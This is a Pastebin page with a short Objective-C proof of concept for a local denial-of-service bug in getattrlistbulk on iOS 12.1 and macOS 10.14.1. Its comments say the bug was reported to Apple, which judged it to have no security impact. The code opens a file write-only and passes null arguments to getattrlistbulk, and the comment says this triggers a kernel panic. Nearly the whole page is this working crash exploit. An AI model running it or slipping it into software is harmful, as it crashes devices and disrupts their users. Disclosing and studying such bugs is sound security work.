SHARE
TWEET

iOS 12.1 / MacOS 10.14.1 getattrlistbulk local DoS

a guest Oct 30th, 2018 806 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //
  2. //  getattrlistbulk_dos.m
  3. //  getattrlistbulk_dos
  4. //
  5. //  Created by FABIANO ANEMONE on 7/31/18.
  6. //  Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved.
  7. //  Reported to product-security@apple.com on 7/31/18
  8. //  Still not fixed in Mojave 10.14.1 (and iOS 12.1 I guess, I have no device to test it).
  9. //
  10. //  No CVE assigned ("After further examining your report we do not see any actual security implications.")
  11. //  No bug bounty ("This report did not qualify for an Apple Security Bounty because the issue was not within the program’s current scope.").
  12. //
  13. //  Few more bugs will be disclosed as they get fixed, or after 90 days (mainly local DoS)
  14. //
  15.  
  16. #import <Foundation/Foundation.h>
  17.  
  18. #include <stdio.h>
  19. #include <unistd.h>
  20. #include <sys/syscall.h>
  21. #include <sys/errno.h>
  22.  
  23. int main(int argc, const char * argv[]) {
  24.     NSString* doc = [@"~/Documents" stringByExpandingTildeInPath];
  25.     NSString* path = [doc stringByAppendingString:@"/a.txt"];
  26.     //Make sure to remove any old file if you try more than once, or fopen with O_WRONLY | O_CREAT will fails the second time
  27.     [[NSFileManager defaultManager] removeItemAtPath:path error:nil];
  28.     errno = 0;
  29.     // Important: no READ flag, WRITE only
  30.     int fd_open = open([path UTF8String], O_WRONLY | O_CREAT);
  31.     printf("open: %d - errno: %d\n", fd_open, errno);
  32.     if (fd_open != -1)
  33.     {
  34.         int res_getattrlistbulk = getattrlistbulk(fd_open, NULL, NULL, 0, 0);
  35.         // Kernel panic here (both iOS/MacOS)
  36.         printf("getattrlistbulk: %d - errno: %d\n", res_getattrlistbulk, errno);
  37.     }
  38.     return 0;
  39. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top